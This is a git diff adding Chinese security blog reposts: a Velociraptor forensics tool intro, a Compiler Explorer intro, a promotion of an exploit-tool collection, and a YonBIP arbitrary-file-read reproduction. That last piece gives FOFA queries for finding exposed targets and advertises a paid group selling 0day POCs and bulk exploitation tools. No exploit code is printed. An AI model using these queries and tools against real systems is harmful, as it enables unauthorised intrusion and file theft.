+https://github.com/zidanfanshao/vcenter_tools + + +> **文章来源:李白你好** + + + +黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担! + +如侵权请私聊我们删文 + + +**END** + + diff --git a/doc/Velociraptor:一款终端节点可视化与数据收集工具.md b/doc/Velociraptor:一款终端节点可视化与数据收集工具.md new file mode 100644 index 00000000..37867a66 --- /dev/null +++ b/doc/Velociraptor:一款终端节点可视化与数据收集工具.md @@ -0,0 +1,192 @@ +# Velociraptor:一款终端节点可视化与数据收集工具 +Alpha_h4ck FreeBuf 2024-11-16 02:02 + +![](https://mmbiz.qpic.cn/mmbiz_gif/oQ6bDiaGhdyoFWEgZIHic7sqnootFEuOic7RlQNGhKY6d2ZESG3WpiaTMRlD0z4xO6mQrTZjkWHCkMpO2QtCfUJH6g/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "") + + +**关于Velociraptor** + + +## Velociraptor是一款终端节点可视化与数据收集工具,该工具使用了Velociraptor 查询语言 (VQL) ,可以帮助广大研究人员查询收集基于主机的状态信息。 + + +![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38kicxmSKeQw5hH5XX7P9Sn5gHUcRCfDxzZDLibicibpsosbSSwAV3kXSDUwztKSfiadHMIKqvmGUlXEibA/640?wx_fmt=jpeg&from=appmsg "") +## + +**功能介绍** + + + +Velociraptor 是一个独特、先进的开源端点监控、数字取证和网络响应平台。当前版本的Velociraptor具备以下功能特点: +> 1、能够有效应对数据泄露; +> 2、通过数字取证分析重建威胁行为者的活动; +> 3、寻找威胁行为者的活动证据; +> 4、调查恶意软件爆发和其他可疑网络活动; +> 5、持续监控可疑的用户活动,例如将文件复制到 USB 设备; +> 6、网络外机密信息泄露; +> 7、随着时间的推移收集端点数据,以用于威胁搜寻和未来调查; + +## + +**工具特点** + + +## +> 1、有用 ——每个工件和用例都必须向用户返回有价值的信息 +> 2、简单 ——设计和界面必须易于浏览和使用 +> 3、指导性 ——用户不需要是 DFIR 专家,因为所有元素都应提供信息描述和指导 +> 4、功能强大 ——用户无需做太多额外工作即可实现其目标 +> 5、快速 ——性能应快速且对资源的影响较小,同时允许在需要时管理性能 +> 6、可靠 ——每个功能和工件都应按预期工作,并且相对没有错误和问题 + +## + +**工具要求** + + +## +> Go v1.23.2+ +> make +> gcc +> Node.js LTS(v18.14.2+) + +## + +**工具安装** + + +## + +由于该工具基于Go开发,因此我们首先需要在本地设备上安装并配置好Go v1.23.2+环境。 + + +广大研究人员可以直接使用下列命令将该项目源码克隆至本地: +``` +git clone git clone https://github.com/Velocidex/velociraptor.git +``` +``` +``` + + +然后切换到项目目录中,使用下列命令构建源码: +``` +$ cd velociraptor + +$ cd gui/velociraptor/ + +$ npm install + +$ make build + +$ cd ../.. + +$ make + +$ make linux + +$ make windows +``` + +为了在 Linux 上构建 Windows 二进制文件,您需要 mingw 工具。 +在 Ubuntu 上,这很简单: +``` +$ sudo apt-get install mingw-w64-x86-64-dev gcc-mingw-w64-x86-64 gcc-mingw-w64 +``` +``` +``` + +**工具使用** + + +## +### 快速启动 + +****``` +$ velociraptor gui +``` + +这将启动 GUI、前端和本地客户端。 +您可以像往常一样从客户端(仅在您自己的机器上运行)收集工件。 +### +### 本地运行 Velociraptor + + +Velociraptor 也可用作本地分类工具。您可以使用 GUI 创建一个独立的本地收集器: +> 1、按上述方法启动 GUI ( velociraptor gui)。 +> 2、选择Server Artifacts侧边栏菜单,然后Build Collector。 +> 3、选择并配置您想要收集的工件,然后选择选项Uploaded Files并下载您的自定义收集器。 + +## + +**许可证协议** + + +## + +本项目的开发与发布遵循 +GNU AFFERO GPL v3 +开源许可协议。 +## + +**项目地址** + + +## + +**Velociraptor**: + +https://github.com/Velocidex/velociraptor + + +【 +FreeBuf粉丝交流群招新啦! + +在这里,拓宽网安边界 + +甲方安全建设干货; + +乙方最新技术理念; + +全球最新的网络安全资讯; + +群内不定期开启各种抽奖活动; + +FreeBuf盲盒、大象公仔...... + +扫码添加小蜜蜂微信回复「加群」,申请加入群聊 +】 + +![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR3ich6ibqlfxbwaJlDyErKpzvETedBHPS9tGHfSKMCEZcuGq1U1mylY7pCEvJD9w60pWp7NzDjmM2BlQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "") + + +![](https://mmbiz.qpic.cn/mmbiz_png/oQ6bDiaGhdyodyXHMOVT6w8DobNKYuiaE7OzFMbpar0icHmzxjMvI2ACxFql4Wbu2CfOZeadq1WicJbib6FqTyxEx6Q/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ61icYlLmBLDpdYEZ7nIzpGovpHjtxITB6ibiaC3R5hoibVkQsVLQfdK57w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "") +> https://docs.velociraptor.app/ + +> +> +> +> +> +> +> +> +> +> +> +> +> +> + + +![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ7JfyOicficFrgrD4BHnIMtgCpBbsSUBsQ0N7pHC7YpU8BrZWWwMMghoQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302087&idx=1&sn=29d91904d6471c4b09f4e574ba18a9b2&chksm=bd1c3a4c8a6bb35aa4ddffc0f3e2e6dad475257be18f96f5150c4e948b492f32b1911a6ea435&token=21436342&lang=zh_CN&scene=21#wechat_redirect) + +[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302006&idx=1&sn=18f06c456804659378cf23a5c474e775&scene=21#wechat_redirect) + +[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651253272&idx=1&sn=82468d927062b7427e3ca8a912cb2dc7&scene=21#wechat_redirect) + +![](https://mmbiz.qpic.cn/mmbiz_gif/qq5rfBadR3icF8RMnJbsqatMibR6OicVrUDaz0fyxNtBDpPlLfibJZILzHQcwaKkb4ia57xAShIJfQ54HjOG1oPXBew/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "") + diff --git a/doc/VulToolsKit一把梭漏洞Exploit合集.md b/doc/VulToolsKit一把梭漏洞Exploit合集.md new file mode 100644 index 00000000..bae9b794 --- /dev/null +++ b/doc/VulToolsKit一把梭漏洞Exploit合集.md @@ -0,0 +1,50 @@ +# VulToolsKit一把梭漏洞Exploit合集 +原创 白帽学子 白帽学子 2024-11-16 00:11 + +最近工作上需要做一些网络安全漏洞利用的测试,以确保公司系统的安全性。在这个过程中,我发现了一个很实用的开源网络安全工具合集——VulToolsKit V1.1。 + +这个工具合集包含了各种综合漏洞利用工具,涵盖了海康威视、大华、Nacos、Vcenter等多种系统,并且还有针对Fastjson、Struts2、Thinkphp等框架的漏洞检测工具。使用起来非常方便,而且更新了一些工具和新增了一些功能,让安全测试更加高效。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/LYy9xnADcdjP2GS1micvmPAavXbM1zJiaf0PaNRZ6QIiagffbNEAReqOqR0XndsI3ItgZgaWCTMhpQDlfvdDGGhnw/640?wx_fmt=jpeg "") + +当然,在使用工具进行安全测试时,我们也需要注意一些事项,以确保测试的合法性和安全性。首先,我们应该获得授权并得到相关部门的同意,遵守公司的安全政策和流程。其次,使用工具时要谨慎操作,避免对系统造成损害或泄露敏感信息。 + +想要获取工具的小伙伴可以直接**拉至文章末尾** + +我们来提取并讨论上述工具描述中涉及的网络安全关键技术点: + +1、漏洞Exploit合集: +- VulToolsKit 涵盖了多种系统和框架的漏洞利用工具,包括海康威视、大华、Fastjson、Struts2等。这些工具帮助安全团队快速检测系统中存在的漏洞,并进行利用测试。通过使用漏洞利用工具,可以有效评估系统的安全性,并及时修复潜在的漏洞。 + +2、更新和维护: +- 保持漏洞利用工具合集的更新是至关重要的。随着新的漏洞不断被发现,及时更新工具集中的漏洞利用工具,以确保能够应对最新的安全威胁。定期维护工具集,删除过时或不再使用的工具,也有助于提升安全测试的效率和准确性。。 + +3、合法性和合规性: +- 在进行安全测试时,必须遵守公司的安全政策和流程,获得相关部门的授权和同意。严格遵守当地法律法规,确保测试行为合法合规。同时,避免对系统造成未经授权的损害或泄露敏感信息,保护系统和用户的安全。。 + +4、安全测试和漏洞扫描: +- 除了使用漏洞利用工具进行测试,定期进行安全测试和漏洞扫描也是至关重要的。通过全面的安全测试和漏洞扫描,可以及时发现系统中存在的漏洞,并采取相应的措施加以修复,提高系统的安全性。。 + +5、安全意识培训: +- 除了工具和技术,安全意识培训也是至关重要的一环。通过为员工提供网络安全意识培训,使他们了解常见的网络安全威胁和防范措施,从而减少人为因素造成的安全漏洞。。 + + + + +**下载链接** + +https://github.com/onewinner/VulToolsKit + + + +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/LYy9xnADcdhic61NkXCWKufScrUrmmsG8tztWD8fDRiatPUaljxxpKc1PpnYNFjPibU5FwJmcuO4mZoQg5aXsAcog/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + +声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白名单。 + +请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本公众号无关。 + +✦ + +✦ + diff --git a/doc/compiler explorer 轻松从汇编角度理解代码.md b/doc/compiler explorer 轻松从汇编角度理解代码.md new file mode 100644 index 00000000..f565966f --- /dev/null +++ b/doc/compiler explorer 轻松从汇编角度理解代码.md @@ -0,0 +1,88 @@ +# compiler explorer 轻松从汇编角度理解代码 + 进击的HACK 2024-11-15 23:55 + +## 介绍 + +compiler explorer 是一个交互式编译探索网站。用C、c++、c#、f#、Rust、Go、D、Haskell、Swift、Pascal、ispc、Python、Java或其他30多种支持的语言组件编辑代码,并查看代码在实时编译后的样子。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/DuibU3GqmxVmRsdItbBVRKegNHicHQvAHDdZsGpLVU7touSU1AU1twHTfRjG3Vu5aUh0RnPPllfVUhs4qdWF5QYQ/640?wx_fmt=png&wxfrom=13 "") + +声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途给予盈利等目的,否则后果自行承担! + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/9zYJrD2VibHmqgf4y9Bqh9nDynW5fHvgbgkSGAfRboFPuCGjVoC3qMl6wlFucsx3Y3jt4gibQgZ6LxpoozE0Tdow/640?wx_fmt=png&wxfrom=13 "") + + +截止目前,star 16.4k + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbriaaeH06JQjG2Dh0mz7d6Q4ibbeRmUUpYSZUMQVZfaGRiaYv4bia29tgK1ePDZcD1woiaR6G4CPNLHBYkg/640?wx_fmt=png&from=appmsg "") +### 优点 + +有在线版,国内可这直接访问 https://godbolt.org/有github开源地址,可在本地搭建 https://github.com/compiler-explorer/compiler-explorer + +可以从底层观察各个函数是如何构成的,程序是如何运行的。 + +C、C++、Java、Python都是高级语言,它们为了方便我们人理解,语法进行了很多人性化的操作,方便上手和理解。但随着时间推移,用的多了,项目复杂后,我们可能会变得疑惑,这么写和那么些有什么区别,为什么这么写有问题。 + +有些东西在高级语言上看不同的东西,其实在CPU看来是没有区别的。 + +比如 int i 和 int* p,在汇编代码层次,他们并没有区别,都是给一个栈地址赋值。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbriaaeH06JQjG2Dh0mz7d6Q4ib1dF5SRbRqXib896F63v4icY0DCw6KsKgkb6Y104QKtIHqCT6kDJlRibbQ/640?wx_fmt=png&from=appmsg "") + +对于想要入门逆向的人来说,用 compiler explorer 来了解高级语言和汇编之间的对应关系,为后续逆向汇编,从汇编反编译成高级语言也很有帮助。 + +案例:下面都是支持的语言https://github.com/compiler-explorer/compiler-explorer/tree/main/examples + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbriaaeH06JQjG2Dh0mz7d6Q4ibxOW2DM65WGic85ppVNBQuNZu5Fpfah6OsIclQAUVKdTz2ia5tIcwA8FQ/640?wx_fmt=png&from=appmsg "") + +推荐一本书:《CPU眼里的C/C++》,微信读书上也有 + + +作者根据 compiler explorer 工具,分析了C/C++当中遇到的常见指令,比如指针变量和一般变量的区别,goto和if、for、while的区别。从底层的视角看,往往能解答很多我们在高级语言中看到的代码的疑惑。 + +让我印象最深刻的时候,是看 goto 和 for 的区别,这在C语言中是两个不同的指令,但在汇编层次,我们用 goto 构造指定的代码,然后到了CPU验证,汇编指令是没有任何区别的。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbriaaeH06JQjG2Dh0mz7d6Q4ib652RRZPNlxgogV59fm5gzfwxCNCnM2kqOHyUzZWqzMIZib55Kt4IeuA/640?wx_fmt=png&from=appmsg "") + +还有就是 i++ 和 ++i 的区别。如果是在大学学过C语言,参加过考试的,一定会见过对这两种区别的考核,问最后的结果是多少。从C语言上看,可能不明所以,但到了汇编,具体过程就一目了然。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbriaaeH06JQjG2Dh0mz7d6Q4ibvVicJibeR3vInwD69fNz3IBz5kAVKUQyroCiaHBuh6Z23iaGskbN3MYTpA/640?wx_fmt=png&from=appmsg "") + + +往期推荐 + +[基于flutter的Android vpn代理工具](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486777&idx=1&sn=9c0144199ee718665d6bd790bfb1ee26&chksm=c150aad2f62723c4c2ecbcb94e2d7edbcf4064074d512b96620401dfe59e692ed136406b9dfe&scene=21#wechat_redirect) + + +[用友漏洞一键探测利用](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486765&idx=1&sn=491b37f45c408d9dee05bff7e18a5173&chksm=c150aac6f62723d0ce47ddd18c39fc24525a39be5d9032bf0bdd6a565c4503fd616e39ee6831&scene=21#wechat_redirect) + + +[Jar Obfuscator - 图形化 JAR/CLASS 字节码混淆工具](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486687&idx=1&sn=bd93740fbab2f192142c3c56ee3c3074&chksm=c150ab34f62722221c32a6cd3b9e051fe0f7383d8c7fae763d428b8a117d61eacd43bbe01428&scene=21#wechat_redirect) + + +[降低js逆向分析难度的油猴脚本](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486673&idx=1&sn=d7ca2ae0861850d4807ff558468c79ba&chksm=c150ab3af627222c68566213b34cbcdbe0ca008bf01303c539364ae906259f1490d3cab3d265&scene=21#wechat_redirect) + + +[简单绕过 IOS应用 frida检测](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486561&idx=1&sn=6582b889e69674b5bfc7c817ec7ce2b3&chksm=c150ab8af627229c4fa75be0bc1f27e24aef5a51059fb88b7e6de9e0bf33f93aeaa3479a0294&scene=21#wechat_redirect) + + +[burp插件 | 自动丢弃不需要的http数据包](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486478&idx=1&sn=435438f1416fe0ab5345bb7f2be38354&chksm=c150abe5f62722f38e7282c061f587c6dd9be835cf25d2ebe15925a381c370efab48ffc05b24&scene=21#wechat_redirect) + + +[轻松入门,frida n种过app特征检测办法之一](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486441&idx=1&sn=d3ca56d7bb74111768ad6450ef567589&chksm=c150ac02f627251487e69e23f91ae5556b76ea1e28d63aebe5e62bb79ada5603e97f5453e021&scene=21#wechat_redirect) + + +[小技巧 | Proxifier使用Chain实现多级代理](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486353&idx=1&sn=1376103e17556115de4ee25fa40dd8e7&chksm=c150ac7af627256c464d4e981bb3caa42e747646ccc765ae2319a19260be973dbfec29e116ee&scene=21#wechat_redirect) + + +[SpringBoot jasypt 配置文件/属性ENC加密](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486338&idx=1&sn=dbfdeacd4b8a7698f9666e8ed3e8ac9e&chksm=c150ac69f627257ff376a05283e4d101d45dad4e3307f8722c47df3b91107bab38410a32bb78&scene=21#wechat_redirect) + + +[Databasetools 一款用Go语言编写的数据库自动化提权工具](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486295&idx=1&sn=396bbb6655376fcb2cbd32d33bf62187&chksm=c150acbcf62725aa1442f15a872db0a7944e6dff2b55e7c1409e0f49500ab31dca19d7eda1da&scene=21#wechat_redirect) + + +[在混淆的so中寻找sign签名函数](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486092&idx=1&sn=1337e6907b7f0643a3dd361d1b0bdb35&chksm=c150ad67f62724717af1c95f6c45951454ce2fb1c033a7bb366cebd18f41d7775b3fd8ff2d18&scene=21#wechat_redirect) + + + + diff --git a/doc/【漏洞复现】用友YonBIP高级版存在任意文件读取漏洞.md b/doc/【漏洞复现】用友YonBIP高级版存在任意文件读取漏洞.md new file mode 100644 index 00000000..9837a230 --- /dev/null +++ b/doc/【漏洞复现】用友YonBIP高级版存在任意文件读取漏洞.md @@ -0,0 +1,135 @@ +# 【漏洞复现】用友YonBIP高级版存在任意文件读取漏洞 +xiachuchunmo 银遁安全团队 2024-11-16 00:00 + +**需要EDU SRC邀请码的师傅可以私聊后台,免费赠送EDU SRC邀请码(邀请码管够)** + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +**漏洞简介** + + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +**YonBIP用友商业创新平台,是用友在数字经济时代面向成长型、大型企业及巨型企业,融合了先进且高可用技术平台和公共与关键商业应用与服务,支撑和运行客户的商业创新(业务创新、管理变革),并且具有数字化、智能化、高弹性、安全可信、社会化、全球化、平台化、生态化等特征的综合型服务平台。用友YonBIP高级版yonbiplogin存在任意文件读取漏洞** +**** +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +**资产详情** + + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + +``` +web.body="/nccloud/resources/uap/rbac/login/main/index.html" +title="YonBIP" || title="数字化工作台" +``` + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5icqCxIIodOjYfQgwlrzoc2K50ibUC9dNsoQg5uhoNk6SwzZNcGniaRWzuwMn5rlXh8CXUz6ibGghtklw/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5icqCxIIodOjYfQgwlrzoc2K1IOAk6tB6DOtjzj7asAUY8oru09icsGWk2RWrvnzMhIlpf8iawiaViaPjg/640?wx_fmt=png&from=appmsg "") + + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +**漏洞复现** + + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +**读取/etc/passwd文件测试** + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5icqCxIIodOjYfQgwlrzoc2KUpN8wkj6mfdVTVTFJB4FdVy7iaMDmyYuq5CxJOaV4yhUhsjiaq0ahE7A/640?wx_fmt=png&from=appmsg "") + +**** +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +**Nuclei测试** + + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx59l5tmRaic1icJ8rTpS7iaibXsem4QVIKr4FH0dFjvBeEXhR7zjofDsBvvxKeBqRia2Pc85ytIibjNBiax4g/640?wx_fmt=png&from=appmsg "") + + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +**圈子介绍** + + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +高 +质量漏洞利用工具分享社区,每天至少更新一个0Day/Nday/1day及对应漏洞的批量利用工具,团队内部POC分享,星球不定时更新内外网攻防渗透技巧以及最新学习研究成果等。 +如果师傅还是新手,内部的交流群有很多行业老师傅可以为你解答学习上的疑惑,内部分享的POC可以助你在Edu和补天等平台获得一定的排名。 +如果师傅已经 +是老手了,有一个高质量的LD库也能为你的工作提高极大的效率,实战或者攻防中有需要的Day我们也可以通过自己的途径帮你去寻找。 + +**【圈子服务】** + +1,一年至少365+漏洞Poc及对应漏洞批量利用工具 + +2,Fofa永久高级会员 + +3,24HVV内推途径 + +4,Cmd5解密,各种漏洞利用工具及后续更新,渗透工具、文档资源分享 + +5,内部漏洞 +库情报分享 +(目前已有2000+ +poc,会定期更新,包括部分未公开0/1day) + +6,加入内部微信群,认识更多的行业朋友(群里有100+C**D通用证书师傅),遇到任何技术问题都可以进行快速提问、讨论交流; + + +圈子目前价格为**129元** +**(交个朋友啦!)** +,现在星球有近900+位师傅相信并选择加入我们,人数满1000 +**涨价至149**,圈子每天都会更新内容。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/yeJvia5dNx5ibmJXuUnaww610JyW2aMD7XyghxoOEL12QTuKPMtygJ7abCibjickyRUpBPDf52hoXPRu3nWEmjzt5A/640?wx_fmt=jpeg&from=appmsg "") + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +**圈子近期更新LD库** + + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ib2O29UeBntrAgS16oXwLZvdELfGVX4sNVxPSiatCrY9NMx1M47giajq1iayjibDHo3axOViaY9L4ovZ5g/640?wx_fmt=png&from=appmsg "") + +**每篇文章均有详细且完整WriteUp** + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/yeJvia5dNx5ibK7Dv4GdXpIuKGmLtjmiaeQuz0vbaPubOpv3oWAehI3Pr5flA7KQSUWtKIyycZezdAxmic5rpy2tHw/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +**星球提供免费F**a**![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ic3icibHW6nDoAAoX9Spv9mREyEWTD0kRZWwApI2LKZDlqDfFj0Hnbja85ppeKPty1oOKFD80G5iadWQ/640?wx_fmt=png&from=appmsg "") +**C**D通用证书********一起愉快的刷分**![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ibz6ibFL4b8QBThc3t0ok0Gb7jsseWcrYsxNbv9qyQ0uhDib7TkUcLIIos2iaYlzL6TcF3ia2Rric1EH1g/640?wx_fmt=png&from=appmsg "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ickvP43lKosLxs8SB5kCSQQEP05NRM08qqN1YIrU1QF8ILRniaF4Vu2jbHhTypliczTnEuK5TXobk9A/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +**免责声明** + + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +![](https://mmbiz.qpic.cn/mmbiz_gif/HVNK6rZ71oofHnCicjcYq2y5pSeBUgibJg8K4djZgn6iaWb6NGmqxIhX2oPlRmGe6Yk0xBODwnibFF8XCjxhEV3K7w/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + +文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。 + diff --git a/doc/【漏洞预警】 易宝OA-GetProductInv SQL注入漏洞.md b/doc/【漏洞预警】 易宝OA-GetProductInv SQL注入漏洞.md index 1ddf02a8..635cd258 100644 --- a/doc/【漏洞预警】 易宝OA-GetProductInv SQL注入漏洞.md +++ b/doc/【漏洞预警】 易宝OA-GetProductInv SQL注入漏洞.md @@ -1,5 +1,5 @@ # 【漏洞预警】 易宝OA-GetProductInv SQL注入漏洞 - thelostworld 2024-11-15 20:24 + thelostworld 2024-11-16 09:10 免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!马赛克安全实验室情报申明(可点击查看) ![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicPjtibQUDC6OnlQyWCzfd68f5ycicia6CCgOhrqkvHfLj5ajt2SKLnWoZSh219zUS3eTcERBwhxu9Dg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") diff --git a/doc/【漏洞预警】 用友BIP 数据库配置信息泄露.md b/doc/【漏洞预警】 用友BIP 数据库配置信息泄露.md index 9fb02615..44adb84f 100644 --- a/doc/【漏洞预警】 用友BIP 数据库配置信息泄露.md +++ b/doc/【漏洞预警】 用友BIP 数据库配置信息泄露.md @@ -1,5 +1,5 @@ # 【漏洞预警】 用友BIP 数据库配置信息泄露 - thelostworld 2024-11-15 20:24 + thelostworld 2024-11-16 09:10 免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!马赛克安全实验室情报申明(可点击查看) ![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicPjtibQUDC6OnlQyWCzfd68f5ycicia6CCgOhrqkvHfLj5ajt2SKLnWoZSh219zUS3eTcERBwhxu9Dg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") diff --git a/doc/一款java漏洞集合工具.md b/doc/一款java漏洞集合工具.md new file mode 100644 index 00000000..8ff6a8f7 --- /dev/null +++ b/doc/一款java漏洞集合工具.md @@ -0,0 +1,59 @@ +# 一款java漏洞集合工具 +pureqh 夜组安全 2024-11-16 04:01 + +免责声明 + +由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢! + +朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把 +**夜组安全** +“**设为星标** +”, +否则可能就看不到了啦! + 